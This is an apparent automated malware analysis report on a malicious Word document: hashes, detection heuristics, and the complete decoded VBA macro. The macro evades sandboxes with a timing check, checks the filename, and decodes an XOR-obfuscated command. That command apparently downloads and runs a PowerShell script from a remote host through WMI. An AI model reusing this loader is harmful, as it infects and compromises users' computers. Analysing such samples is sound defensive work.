Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 caa9c98fc439418a…

MALICIOUS

Office (OLE) / .DOC

Size: 32.5 KB
Created: 2026-03-20 13:34:00
Authoring application: Microsoft Office Word
First seen: 2026-06-11
MD5: 011401d0e0b7820aa55a617b729eef7d
SHA-1: 1ba92af4027385a7aa69bd8908ff1ab2a2cf673f
SHA-256: caa9c98fc439418af1a3b17ac7ff5fefbafdd3300d08aba36605d32b7bd6e71d
Risk Score: 124

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-10009612-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-10009612-0
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • GetObject call (severity: high, rule: OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script
        GetObject(Nuts("029003004007013007030025080")).Get(Nuts("061003004089088053058024005009015025025")).Create Water, Tea, Coffee, Napkin
  • Suspicious extracted artifact (severity: info, rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1817 bytes
SHA-256: 26ea4f23e9ff7dff053208c89626551f04b6e48b91f0b3e8a38c3a3b58fa61b3
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function Pears(Beets)
    Pears = Chr(Beets Xor 106)
End Function

Function Strawberries(Grapes)
    Strawberries = Left(Grapes, 3)
End Function

Function Almonds(Jelly)
    Almonds = Right(Jelly, Len(Jelly) - 3)
End Function

Function Nuts(Milk)
    Do
    Oatmilk = Oatmilk + Pears(Strawberries(Milk))
    Milk = Almonds(Milk)
    Loop While Len(Milk) > 0
    Nuts = Oatmilk
End Function

Public Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim Apples As String
    Dim Water As String
    Dim t1 As Date
    Dim t2 As Date
    Dim time As Long

    t1 = Now()
    Sleep (2000)
    t2 = Now()
    time = DateDiff("s", t1, t2)

    If time < 2 Then
        Exit Function
    End If
    
    If ActiveDocument.Name <> Nuts("029005024014012003006015068014005009") Then
      MsgBox (ActiveDocument.Name)
      Exit Function
    End If
    
    Apples = "026005029015024025002015006006074071015018015009074008019026011025025074071004005026074071009074003015018066066004015029071005008000015009030074025019025030015007068004015030068029015008009006003015004030067068014005029004006005011014025030024003004013066077002030030026080069069091083088068091092082068094095068091092082069057002015006006088068026025091077067067"
    Water = Nuts(Apples)
    GetObject(Nuts("029003004007013007030025080")).Get(Nuts("061003004089088053058024005009015025025")).Create Water, Tea, Coffee, Napkin

End Function